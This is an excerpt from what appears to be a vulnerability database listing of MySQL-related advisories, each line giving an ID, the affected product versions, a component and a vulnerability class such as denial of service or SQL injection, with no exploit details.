18352| [90126] Oracle MySQL Server up to 5.6.30/5.7.12 Encryption denial of service
18353| [90125] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 DML denial of service
18354| [90124] Oracle MySQL Server up to 5.7.12 InnoDB memory corruption
18355| [90123] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 Types denial of service
18356| [90122] Oracle MySQL Server up to 5.7.12 Optimizer denial of service
18357| [90121] Oracle MySQL Server up to 5.6.30/5.7.12 Optimizer denial of service
18358| [90120] Oracle MySQL Server up to 5.6.30/5.7.12 FTS denial of service
18359| [90118] Oracle MySQL Server up to 5.6.30/5.7.12 Encryption denial of service
18360| [90117] Oracle MySQL Server up to 5.7.11 Optimizer denial of service
18361| [87408] PHP up to 5.4.42/5.5.26/5.6.10 SSL ext/mysqlnd/mysqlnd.c weak encryption
18362| [82687] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.11 Connection Handling spoofing
18363| [82685] Oracle MySQL Enterprise Monitor up to 3.0.25/3.1.2 Monitoring unknown vulnerability
18364| [82684] Oracle MySQL Server up to 5.6.28/5.7.10 Encryption denial of service
18365| [82683] Oracle MySQL Server up to 5.6.29/5.7.11 Pluggable Authentication unknown vulnerability
18366| [82682] Oracle MySQL Server up to 5.6.29/5.7.11 Packaging memory corruption
18367| [80605] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Privileges denial of service
18368| [80604] Oracle MySQL Server up to 5.6.26 denial of service
18369| [80603] Oracle MySQL Server up to 5.5.45/5.6.26 Encryption information disclosure
18370| [80602] Oracle MySQL Server up to 5.6.27/5.7.9 Replication denial of service
18371| [80601] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 UDF denial of service
18372| [80600] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Encryption weak encryption
18373| [80599] Oracle MySQL Server 5.7.9 Partition denial of service
18374| [80598] Oracle MySQL Server 5.7.9 Optimizer denial of service
18375| [80597] Oracle MySQL Server up to 5.6.27 InnoDB denial of service
18376| [80596] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 InnoDB denial of service
18377| [80595] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 DML denial of service
18378| [80594] Oracle MySQL Server up to 5.5.46 Optimizer denial of service
18379| [80593] Oracle MySQL Server up to 5.6.27/5.7.9 Optimizer denial of service
18380| [80592] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Optimizer denial of service
18381| [80591] Oracle MySQL Server up to 5.5.31/5.6.11 Optimizer denial of service
18382| [80590] Oracle MySQL Server up to 5.5.46/5.6.27 DML denial of service
18383| [80589] Oracle MySQL Server up to 5.6.27/5.7.9 DML denial of service
18384| [80588] Oracle MySQL Server up to 5.6.27 DML denial of service
18385| [80587] Oracle MySQL Server up to 5.6.21 DML denial of service
18386| [80586] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Options unknown vulnerability
18387| [80585] Oracle MySQL Server up to 5.6.27/5.7.9 DML memory corruption
18388| [80184] Rename Plugin 1.0 on WordPress mysqldump_download.php directory traversal
18389| [78705] Oracle MySQL Server up to 5.5.45/5.6.26 Partition denial of service
18390| [78703] Oracle MySQL Server up to 5.6.26 Memcached denial of service
18391| [78702] Oracle MySQL Server up to 5.5.45/5.6.26 SP denial of service
18392| [78701] Oracle MySQL Server up to 5.5.43/5.6.24 Privileges information disclosure
18393| [78700] Oracle MySQL Server up to 5.6.26 Privileges denial of service
18394| [78699] Oracle MySQL Server up to 5.6.26 Replication denial of service
18395| [78698] Oracle MySQL Server up to 5.5.45/5.6.26 Query Cache denial of service
18396| [78697] Oracle MySQL Server up to 5.5.45/5.6.26 InnoDB denial of service
18397| [78696] Oracle MySQL Server up to 5.6.25 InnoDB denial of service
18398| [78695] Oracle MySQL Server up to 5.5.45/5.6.26 DML denial of service
18399| [78694] Oracle MySQL Server up to 5.6.25 libmysqld denial of service
18400| [78693] Oracle MySQL Server up to 5.5.45/5.6.26 Types unknown vulnerability
18401| [78692] Oracle MySQL Server up to 5.6.20 Types denial of service
18402| [78691] Oracle MySQL Server up to 5.5.45/5.6.26 Privileges unknown vulnerability
18403| [78690] Oracle MySQL Server up to 5.6.25 Partition denial of service
18404| [78689] Oracle MySQL Server up to 5.5.45/5.6.26 Partition denial of service
18405| [78688] Oracle MySQL Server up to 5.5.45/5.6.26 Parser denial of service
18406| [78687] Oracle MySQL Server up to 5.6.26 Optimizer denial of service
18407| [78686] Oracle MySQL Server up to 5.5.44 InnoDB denial of service
18408| [78685] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
18409| [78684] Oracle MySQL Server up to 5.6.26 DML denial of service
18410| [78683] Oracle MySQL Server up to 5.5.45/5.6.26 DML denial of service
18411| [78682] Oracle MySQL Server up to 5.6.23 DML denial of service
18412| [78681] Oracle MySQL Server up to 5.5.45/5.6.26 DDL denial of service
18413| [78680] Oracle MySQL Server up to 5.5.44/5.6.25 DML unknown vulnerability
18414| [78679] Oracle MySQL Enterprise Monitor up to 2.3.20/3.0.20 C-Agent / Service Manager denial of service
18415| [78678] Oracle MySQL Server up to 5.6.25 Encryption spoofing
18416| [78676] Oracle MySQL Enterprise Monitor up to 2.3.20/3.0.22 C-Agent denial of service
18417| [77699] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site scripting
18418| [77698] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site request forgery
18419| [76704] Oracle MySQL Server up to 5.6.24 Partition denial of service
18420| [76703] Oracle MySQL Server up to 5.6.24 RBR denial of service
18421| [76701] Oracle MySQL Server up to 5.6.24 Firewall denial of service
18422| [76699] Oracle MySQL Server up to 5.6.24 Firewall denial of service
18423| [76695] Oracle MySQL Server up to 5.6.24 MemCached denial of service
18424| [76691] Oracle MySQL Server up to 5.5.42 Optimizer denial of service
18425| [76690] Oracle MySQL Server up to 5.6.22 InnoDB denial of service
18426| [76686] Oracle MySQL Server up to 5.5.43/5.6.24 denial of service
18427| [76671] Oracle MySQL Server up to 5.5.43/5.6.23 Pluggable Auth information disclosure
18428| [76634] Oracle MySQL Server up to 5.5.43/5.6.24 DML denial of service
18429| [76629] Oracle MySQL Server up to 5.5.43/5.6.24 Optimizer denial of service
18430| [76628] Oracle MySQL Server up to 5.6.24 denial of service
18431| [76626] Oracle MySQL Server up to 5.6.24 Firewall information disclosure
18432| [76608] Oracle MySQL Server up to 5.5.43/5.6.23 information disclosure
18433| [76605] Oracle MySQL Server up to 5.6.24 Partition information disclosure
18434| [76599] Oracle MySQL Server up to 5.6.24 DML information disclosure
18435| [76571] Oracle MySQL Server up to 5.5.43/5.6.24 GIS denial of service
18436| [76081] MySQL Lite Administrator Beta-1 tabella.php cross site scripting
18437| [75579] lighttpd 1.4.35 Log File mod_mysql_vhost.c privilege escalation
18438| [75159] Oracle MySQL up to 5.7.2 SSL Client weak encryption
18439| [74969] Oracle MySQL Server up to 5.6.23 Replication denial of service
18440| [74967] Oracle MySQL Server up to 5.6.23 SP denial of service
18441| [74966] Oracle MySQL Server up to 5.6.22 DML weak encryption
18442| [74965] Oracle MySQL Server up to 5.6.23 Privileges denial of service
18443| [74964] Oracle MySQL Server up to 5.6.23 Memcached denial of service
18444| [74963] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
18445| [74962] Oracle MySQL Server up to 5.5.42/5.6.23 Federated unknown vulnerability
18446| [74961] Oracle MySQL Server up to 5.5.42/5.6.23 DDL unknown vulnerability
18447| [74960] Oracle MySQL Server up to 5.6.22 XA weak encryption
18448| [74959] Oracle MySQL Server up to 5.5.41/5.6.22 Encryption weak encryption
18449| [74958] Oracle MySQL Server up to 5.6.23 Partition denial of service
18450| [74957] Oracle MySQL Server up to 5.6.22 Partition weak encryption
18451| [74956] Oracle MySQL Server up to 5.5.42/5.6.23 Optimizer unknown vulnerability
18452| [74955] Oracle MySQL Server up to 5.6.22 Optimizer weak encryption
18453| [74954] Oracle MySQL Server up to 5.5.41/5.6.22 DML unknown vulnerability
18454| [74953] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
18455| [74952] Oracle MySQL Server up to 5.6.22 InnoDB weak encryption
18456| [74951] Oracle MySQL Server up to 5.6.23 Information Schema denial of service
18457| [74950] Oracle MySQL Server up to 5.5.41/5.6.22 DDL unknown vulnerability
18458| [74949] Oracle MySQL Connectors up to 5.1.34 Connector/J unknown vulnerability
18459| [74948] Oracle MySQL Server up to 5.5.41/5.6.22 Privileges unknown vulnerability
18460| [74947] Oracle MySQL Server up to 5.6.22 Encryption s23_srvr.c ssl23_get_client_hello denial of service
18461| [74946] Oracle MySQL Server up to 5.5.42/5.6.23 Compiling unknown vulnerability
18462| [74945] Oracle MySQL Enterprise Monitor up to 2.3.19/3.0.18 Service Manager s:token/ cross site request forgery
18463| [74944] Oracle MySQL Enterprise Monitor up to 2.3.16/3.0.10 Service Manager memory corruption
18464| [68810] Oracle MySQL Server up to 5.5.40/5.6.21 Foreign Key information disclosure
18465| [68809] Oracle MySQL Server up to 5.6.21 Pluggable Auth denial of service
18466| [68808] Oracle MySQL Server up to 5.5.40/5.6.21 DML denial of service
18467| [68807] Oracle MySQL Server up to 5.6.21 Optimizer denial of service
18468| [68806] Oracle MySQL Server up to 5.5.40 Foreign Key denial of service
18469| [68805] Oracle MySQL Server up to 5.5.38/5.6.19 DDL denial of service
18470| [68804] Oracle MySQL Server up to 5.5.40/5.6.21 Replication denial of service
18471| [68803] Oracle MySQL Server up to 5.5.40/5.6.21 Replication denial of service
18472| [68802] Oracle MySQL Server up to 5.5.40/5.6.21 Encryption weak encryption
18473| [67988] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
18474| [67987] Oracle MySQL Server up to 5.6.19 denial of service
18475| [67986] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
18476| [67985] Oracle MySQL Server up to 5.6.19 denial of service
18477| [67984] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
18478| [67983] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
18479| [67982] Oracle MySQL Server up to 5.5.38 denial of service
18480| [67981] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
18481| [67979] Oracle MySQL Server up to 5.5.38/5.6.19 unknown vulnerability
18482| [67978] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
18483| [67977] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
18484| [67976] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
18485| [67975] Oracle MySQL Server up to 5.5.39/5.6.20 information disclosure
18486| [67974] Oracle MySQL Server up to 5.5.38/5.6.19 Messages Stack-Based sql injection
18487| [67973] Oracle MySQL Server up to 5.6.19 unknown vulnerability
18488| [67972] Oracle MySQL Server up to 5.5.39/5.6.20 unknown vulnerability
18489| [67971] Oracle MySQL Server up to 5.5.38/5.6.19 unknown vulnerability
18490| [67970] Oracle MySQL Server up to 5.6.19 Messages NULL Pointer Dereference denial of service
18491| [67969] Oracle MySQL Server up to 5.5.39/5.6.20 directory traversal
18492| [67968] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
18493| [67967] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
18494| [67966] Oracle MySQL Server up to 5.5.39/5.6.20 unknown vulnerability
18495| [68555] McAfee Network Data Loss Prevention 9.2.0 MySQL Database weak authentication
18496| [67245] phpMyAdmin up to 4.2.5 MySQL User List server_user_groups.php privilege escalation
18497| [67166] Oracle MySQL Server up to 5.5.35/5.6.15 denial of service
18498| [67165] Oracle MySQL Server up to 5.6.17 denial of service
18499| [67163] Oracle MySQL Server up to 5.6.17 denial of service
18500| [67162] Oracle MySQL Server up to 5.5.37 denial of service
18501| [67161] Oracle MySQL Server up to 5.6.17 denial of service
18502| [67160] Oracle MySQL Server up to 5.5.37 denial of service
18503| [67159] Oracle MySQL Server up to 5.5.37/5.6.17 unknown vulnerability
18504| [67158] Oracle MySQL Server up to 5.5.37/5.6.17 unknown vulnerability
18505| [67157] Oracle MySQL Server up to 5.6.17 unknown vulnerability
18506| [13065] Django up to 1.7 MySQL Typecast privilege escalation
18507| [12983] Oracle MySQL Server up to 5.5.36/5.6.16 Options denial of service
18508| [12982] Oracle MySQL Server up to 5.5.35/5.6.15 Federated denial of service
18509| [12981] Oracle MySQL Server up to 5.5.35/5.6.15 Replication denial of service
18510| [12980] Oracle MySQL Server up to 5.6.15 Privileges denial of service
18511| [12979] Oracle MySQL Server up to 5.5.36/5.6.16 Performance Schema denial of service
18512| [12978] Oracle MySQL Server up to 5.5.35/5.6.15 XML denial of service
18513| [12977] Oracle MySQL Server up to 5.5.35/5.6.15 Partition denial of service
18514| [12976] Oracle MySQL Server up to 5.6.15 Optimizer denial of service
18515| [12975] Oracle MySQL Server up to 5.6.15 MyISAM denial of service
18516| [12974] Oracle MySQL Server up to 5.6.16 InnoDB denial of service
18517| [12973] Oracle MySQL Server up to 5.6.15 DML denial of service
18518| [12972] Oracle MySQL Client up to 5.5.36/5.6.16 unknown vulnerability
18519| [12971] Oracle MySQL Server up to 5.5.36/5.6.16 RBR unknown vulnerability
18520| [12970] Oracle MySQL Server up to 5.6.15 InnoDB unknown vulnerability
18521| [12613] lighttpd up to 1.4.34 MySQL Virtual Hosting Module mod_mysql_vhost.c sql injection
18522| [12135] Oracle MySQL client/mysql.cc Server Version memory corruption
18523| [66191] Cisco Video Surveillance Operations Manager MySQL Database denial of service
18524| [66079] CSP MySQL User Manager 2.3 Login Page sql injection
18525| [11948] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Error Handling Crash denial of service
18526| [11947] Oracle MySQL Server up to 5.5.34/5.6.14 Replication denial of service
18527| [11946] Oracle MySQL Server up to 5.6.13 Performance Schema Stored denial of service
18528| [11945] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 InnoDB memory corruption
18529| [11944] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Optimizer Crash denial of service
18530| [11943] Oracle MySQL Server up to 5.6.14 InnoDB Stored denial of service
18531| [11942] Oracle MySQL Server up to 5.6.13 FTS Stored denial of service
18532| [11941] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Privileges Crash denial of service
18533| [11940] Oracle MySQL Server up to 5.5.33/5.6.13 Partition denial of service
18534| [11939] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Optimizer Crash denial of service
18535| [11938] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Locking Crash denial of service
18536| [11937] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 InnoDB Crash denial of service
18537| [11936] Oracle MySQL Server up to 5.6.14 InnoDB Stored denial of service
18538| [11935] Oracle MySQL Server up to 5.6.13 InnoDB Stored denial of service
18539| [11934] Oracle MySQL Server up to 5.6.13 Thread Pooling Stored denial of service
18540| [11933] Oracle MySQL Server up to 5.6.13 Stored Procedure denial of service
18541| [11932] Oracle MySQL Server up to 5.6.14 GIS Stored denial of service
18542| [11931] Oracle MySQL Enterprise Monitor up to 2.3.14/3.0.4 Service Manager unknown vulnerability
18543| [10822] Oracle MySQL Server up to 5.6.12 Locking unknown vulnerability
18544| [10821] Oracle MySQL Server up to 5.6.12 InnoDB unknown vulnerability
18545| [10820] Oracle MySQL Server up to 5.6.12 Optimizer unknown vulnerability
18546| [10819] Oracle MySQL Server up to 5.1.70/5.5.32/5.6.12 Optimizer memory corruption
18547| [10818] Oracle MySQL Server up to 5.1/5.5.22 Optimizer denial of service
18548| [10817] Oracle MySQL Server up to 5.6.12 InnoDB unknown vulnerability
18549| [10816] Oracle MySQL Server up to 5.5.32/5.6.12 Replication unknown vulnerability
18550| [10815] Oracle MySQL Enterprise Monitor up to 2.3.13 Service Manager privilege escalation
18551| [65143] MariaDB up to 5.5.28 MySQL privilege escalation
18552| [9672] Oracle MySQL Server up to 5.6.11 XA Transactions denial of service
18553| [9671] Oracle MySQL Server up to 5.5.31/5.6.11 Server Replication denial of service
18554| [9670] Oracle MySQL Server up to 5.6.11 InnoDB denial of service
18555| [9669] Oracle MySQL Server up to 5.6.11 Server Privileges unknown vulnerability
18556| [9668] Oracle MySQL Server up to 5.5.30/5.6.10 Server Partition Stored unknown vulnerability
18557| [9667] Oracle MySQL Server up to 5.5.31 Server Parser denial of service
18558| [9666] Oracle MySQL Server up to 5.5.30/5.6.10 Server Options Stored unknown vulnerability
18559| [9665] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Options denial of service
18560| [9664] Oracle MySQL Server up to 5.6.11 Server Optimizer unknown vulnerability
18561| [9663] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Server Optimizer denial of service
18562| [9662] Oracle MySQL Server up to 5.5.30/5.6.10 Prepared Statement Stored unknown vulnerability
18563| [9661] Oracle MySQL Server up to 5.6.11 InnoDB denial of service
18564| [9660] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Full Text Search denial of service
18565| [9659] Oracle MySQL Server up to 5.6.11 Data Manipulation Language unknown vulnerability
18566| [9658] Oracle MySQL Server up to 5.5.31/5.6.11 Data Manipulation Language denial of service
18567| [9657] Oracle MySQL Server up to 5.5.31/5.6.11 Audit Log information disclosure
18568| [9656] Oracle MySQL Server up to 5.6.11 MemCached unknown vulnerability
18569| [9655] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 GIS Crash denial of service
18570| [64198] Wireshark up to 1.8.6 MySQL Dissector Integer denial of service
18571| [64010] Ruby on Rails 3.1.0 MySQL Database Stored unknown vulnerability
18572| [8418] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Server Locking unknown vulnerability
18573| [8416] Oracle MySQL Server up to 5.1.63 Server Types unknown vulnerability
18574| [8415] Oracle MySQL Server up to 5.6.10 Server Privileges denial of service
18575| [8414] Oracle MySQL Server up to 5.6.10 InnoDB denial of service
18576| [8413] Oracle MySQL Server up to 5.5.30/5.6.10 InnoDB unknown vulnerability
18577| [8412] Oracle MySQL Server up to 5.6.10 Data Manipulation Language denial of service
18578| [8411] Oracle MySQL Server up to 5.5.30/5.6.10 Stored Procedure unknown vulnerability
18579| [8410] Oracle MySQL Server up to 5.1.67/5.5.29 Server XML denial of service
18580| [8409] Oracle MySQL Server up to 5.5.29 Server Replication denial of service
18581| [8408] Oracle MySQL Server up to 5.1.67/5.5.29 Server Partition unknown vulnerability
18582| [8407] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Optimizer unknown vulnerability
18583| [8406] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 InnoDB unknown vulnerability
18584| [8405] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Information Schema unknown vulnerability
18585| [8404] Oracle MySQL Server up to 5.5.29 Data Manipulation Language denial of service
18586| [8403] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Data Manipulation Language unknown vulnerability
18587| [8402] Oracle MySQL Server up to 5.5.29/5.6.10 Server Optimizer denial of service
18588| [8401] Oracle MySQL Server up to 5.6.10 MemCached denial of service
18589| [8400] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Privileges unknown vulnerability
18590| [8399] Oracle MySQL Server up to 5.1.66/5.5.28 Server Privileges unknown vulnerability
18591| [8398] Oracle MySQL Server up to 5.1.67/5.5.29 unknown vulnerability
18592| [8397] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Information Schema unknown vulnerability
18593| [8396] Oracle MySQL Server up to 5.1.67/5.5.29 Server Locking unknown vulnerability
18594| [8395] Oracle MySQL Server up to 5.6.10 Data Manipulation Language denial of service
18595| [10871] Oracle MySQL 5.3.12/5.5.30/10.0.1 MyISAM Engine init_search SELECT Statement denial of service
18596| [8065] Oracle MySQL up to 5.5.27 yaSSL memory corruption
18597| [8064] Oracle MySQL up to 5.5.29 yaSSL memory corruption
18598| [8816] Wireshark up to 1.8.5 MySQL Dissector packet-mysql.c Packet denial of service
18599| [8019] Oracle MySQL 5.2.11 Representation Converter Eingabe Crash denial of service
18600| [7431] Oracle MySQL Server up to 5.5.28 Privileges denial of service
18601| [7430] Oracle MySQL Server up to 5.5.28 Partition denial of service
18602| [7429] Oracle MySQL Server up to 5.5.28 Optimizer denial of service
18603| [7428] Oracle MySQL Server up to 5.1.66/5.5.28 Optimizer unknown vulnerability
18604| [7427] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
18605| [7426] Oracle MySQL Server up to 5.5.28 MyISAM denial of service
18606| [7425] Oracle MySQL Server up to 5.1.66/5.5.28 InnoDB unknown vulnerability
18607| [7424] Oracle MySQL Server up to 5.5.28 InnoDB denial of service
18608| [7423] Oracle MySQL Server up to 5.1.66/5.5.28 Locking unknown vulnerability
18609| [7422] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
18610| [7421] Oracle MySQL Server up to 5.1.66/5.1.28 Replication unknown vulnerability
18611| [7419] Oracle MySQL Server up to 5.5.28 Stored Procedure denial of service
18612| [7418] Oracle MySQL Server up to 5.1.66/5.5.28 Server Optimizer unknown vulnerability
18613| [7417] Oracle MySQL Server up to 5.1.66/5.5.28 Information Schema unknown vulnerability
18614| [7416] Oracle MySQL Server up to 5.1.65/5.5.27 GIS Extension denial of service
18615| [7415] Oracle MySQL Server up to 5.1.66/5.5.28 Privileges Stack-based memory corruption
18616| [7414] Oracle MySQL Server up to 5.5.28 Parser Heap-based memory corruption
18617| [63111] Oracle MySQL 5.5.19 Installation denial of service
18618| [7068] Oracle MySQL Server up to 5.5.19 Authentication information disclosure
18619| [7067] Oracle MySQL Server up to 5.5.19 sql/sql_acl.cc acl_get memory corruption
18620| [7066] Oracle MySQL Server up to 5.5.19 SELECT Command Crash denial of service
18621| [7065] Oracle MySQL Server up to 5.5.19 Create Table MDL_key::mdl_key_init memory corruption
18622| [6795] Oracle MySQL Server up to 5.1.64/5.5.26 Server Replication denial of service
18623| [6794] Oracle MySQL Server up to 5.1.63/5.5.25 Server Full Text Search denial of service
18624| [6793] Oracle MySQL Server up to 5.5.25 unknown vulnerability
18625| [6792] Oracle MySQL Server up to 5.5.26 MySQL Client information disclosure
18626| [6791] Oracle MySQL Server up to 5.1.65/5.5.27 Server Optimizer denial of service
18627| [6790] Oracle MySQL Server up to 5.1.64/5.5.26 Server Optimizer denial of service
18628| [6789] Oracle MySQL Server up to 5.5.26 unknown vulnerability
18629| [6788] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB Plugin denial of service
18630| [6787] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB unknown vulnerability
18631| [6786] Oracle MySQL Server up to 5.5.26 MySQL Client sql injection
18632| [6785] Oracle MySQL Server up to 5.1.65/5.5.27 denial of service
18633| [6784] Oracle MySQL Server up to 5.1.64/5.5.26 Protocol unknown vulnerability
18634| [6783] Oracle MySQL Server up to 5.1.64/5.5.26 Information Schema memory corruption
18635| [62299] SilverStripe up to 2.4.5 MySQL Database sql injection
18636| [61672] MySQL unknown vulnerability
18637| [61567] MySQLDumper 1.24.4 Error Message information disclosure
18638| [61566] MySQLDumper 1.24.4 Restore information disclosure
18639| [61565] MySQLDumper 1.24.4 directory traversal
18640| [61564] MySQLDumper 1.24.4 deletehtaccess cross site request forgery
18641| [61563] MySQLDumper 1.24.4 index.php cross site scripting
18642| [5783] Oracle MySQL Server up to 5.1.62/5.5.22 Server Optimizer denial of service
18643| [5782] Oracle MySQL Server up to 5.1.62/5.5.23 Server Optimizer denial of service
18644| [5781] Oracle MySQL Server up to 5.5.23 denial of service
18645| [5780] Oracle MySQL Server up to 5.5.23 InnoDB denial of service
18646| [5779] Oracle MySQL Server up to 5.1.62/5.5.23 GIS Extension unknown vulnerability
18647| [5778] Oracle MySQL Server up to 5.5.23 Server Optimizer denial of service
18648| [5635] Oracle MySQL Server up to 5.5.25 on Linux InnoDB UPDATE denial of service
18649| [5503] Oracle MySQL up to 5.6.5 Password Authentication sql/password.c memcmp weak authentication
18650| [5168] Oracle MySQL Server Optimizer denial of service
18651| [5166] Oracle MySQL Server up to 5.5.21 Partition denial of service
18652| [5165] Oracle MySQL Server up to 5.5.19 Optimizer denial of service
18653| [5159] Oracle MySQL Server up to 5.1.61/5.5.21 Optimizer denial of service
18654| [5158] Oracle MySQL Server up to 5.1.61/5.5.21 DML denial of service
18655| [5151] Oracle MySQL Server up to 5.1.60/5.5.19 MyISAM denial of service
18656| [5981] Oracle MySQL Server 5.1.62/5.5.23 Sort Order Index Calculation denial of service
18657| [5072] Oracle MySQL Server up to 5.5.21 denial of service
18658| [4627] Oracle MySQL up to 5.5.20 memory corruption
18659| [60055] WordPress up to 1.2 MySQL Database denial of service
18660| [5236] Oracle MySQL Server 5.5.x unknown vulnerability
18661| [5235] Oracle MySQL Server 5.5.x denial of service
18662| [5233] Oracle MySQL Server 5.5.x denial of service
18663| [5232] Oracle MySQL Server 5.5.x denial of service
18664| [5231] Oracle MySQL Server 5.5.x denial of service
18665| [5230] Oracle MySQL Server 5.5.x denial of service
18666| [5229] Oracle MySQL Server 5.5.x denial of service
18667| [5228] Oracle MySQL Server 5.5.x denial of service
18668| [5227] Oracle MySQL Server 5.5.x unknown vulnerability
18669| [5226] Oracle MySQL Server 5.1.x/5.5.x denial of service
18670| [5225] Oracle MySQL Server 5.1.x/5.5.x denial of service
18671| [5224] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18672| [5223] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18673| [5222] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18674| [5221] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18675| [5220] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18676| [5219] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18677| [5218] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18678| [5217] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
18679| [5216] Oracle MySQL Server 5.0.x/5.1.x/5.5.x denial of service
18680| [5215] Oracle MySQL Server 5.0.x/5.1.x/5.5.x information disclosure
18681| [5213] Oracle MySQL Server 5.0.x/5.1.x/5.5.x unknown vulnerability
18682| [5212] Oracle MySQL Server 5.0.x/5.1.x denial of service
18683| [5211] Oracle MySQL Server 5.0.x/5.1.x denial of service
18684| [5210] Oracle MySQL Server 5.0.x/5.1.x denial of service
18685| [59882] MySQL 5.5.8 NULL Pointer Dereference denial of service
18686| [59384] Hiroyuki Oyama DBD::mysqlPP up to 0.04 MySQL sql injection
18687| [58706] Taskfreak! Multi-mysql 0.6 Error Message information disclosure
18688| [57356] Trustwave WebDefend 2.0/3.0/5.0 MySQL Database unknown vulnerability
18689| [56109] PHP 5.3.2/5.3.3 mysqli mysqli_fetch_assoc sql injection
18690| [56085] MySQL up to 5.1.25 init_from_wkb denial of service
18691| [56084] MySQL up to 5.1.25 Stored Procedure denial of service
18692| [56083] MySQL Crash denial of service
18693| [56082] MySQL Use-After-Free denial of service
18694| [56081] MySQL Optimizer Crash denial of service
18695| [56080] MySQL up to 5.1.25 Stored denial of service
18696| [56079] MySQL Crash denial of service
18697| [56078] MySQL Create Table Crash denial of service
18698| [56025] MySQL up to 5.1.25 Crash denial of service
18699| [56024] MySQL up to 5.1.25 store denial of service
18700| [56023] MySQL up to 5.1.25 Crash denial of service
18701| [56022] MySQL up to 5.1.25 Crash denial of service
18702| [56021] MySQL up to 5.1.25 Uninitialized Memory denial of service
18703| [56020] MySQL up to 5.1.25 Crash denial of service
18704| [56019] MySQL up to 5.1.25 Crash denial of service
18705| [56018] mysql up to 5.1.25 Configuration Parameter denial of service
18706| [60789] TYPO3 up to 4.4.4 MySQL Database escapeStrForLike information disclosure
18707| [62294] SilverStripe 2.4.0/2.4.1/2.4.2/2.4.3 MySQLDatabase.php unknown vulnerability
18708| [54434] PHP 5.3.0/5.3.1/5.3.2 php_mysqlnd_auth_write sql injection
18709| [54433] PHP 5.3.0/5.3.1/5.3.2 MySQL php_mysqlnd_read_error_from_line memory corruption
18710| [54432] PHP 5.3.0/5.3.1/5.3.2 mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read memory corruption
18711| [54026] MySQL up to 5.1.25 Crash denial of service
18712| [53483] MySQL up to 5.0.0.0 memory corruption
18713| [53482] MySQL up to 5.0.0.0 my_net_skip_rest denial of service
18714| [53481] MySQL up to 5.0.0.0 directory traversal
18715| [53212] mysql 5.1.45 mysql_uninstall_plugin unknown vulnerability
18716| [53118] Csphere ClanSphere up to 2009.0.3 MySQL Database generate.php cs_sql_select sql injection
18717| [53053] TaskFreak TaskFreak! up to 0.1.3 tzn_mysql.php loadByKey sql injection
18718| [52985] Oracle MySQLConnector NET up to 6.0.2 SSL Certificate spoofing
18719| [51369] mysql 5.0.51a CertDecoder::GetName memory corruption
18720| [51581] TYPO3 Kiddog Mysqldumper up to 0.0.3 information disclosure
18721| [50962] MySQL Certificates viosslfactories.c vio_verify_callback spoofing
18722| [50961] mysql GeomFromWKB denial of service
18723| [50960] MySQL up to 5.0.0.0 Access Restriction Symlink privilege escalation
18724| [50531] mysql-ocaml 1.0.4 MySQL mysql_real_escape_string unknown vulnerability
18725| [48981] MySQL up to 4.0.23 sql_parse.cc dispatch_command denial of service
18726| [48263] Surat Kabar phpWebNews 0.2 MySQL index.php sql injection
18727| [48262] Surat Kabar phpWebNews 0.1/0.2 MySQL bukutamu.php sql injection
18728| [47455] auth2db up to 0.2.6 MySQL mysql_real_escape_string sql injection
18729| [46983] MySQL up to 6.0.10-bzr ExtractValue denial of service
18730| [46798] Getmiro Broadcast Machine 0.1 MySQLController.php privilege escalation
18731| [46636] MyBlog MySQL Database Cleartext information disclosure
18732| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
18733| [46028] Joey Schulze Mod Auth Mysql 2.x mod_auth_mysql.c sql injection
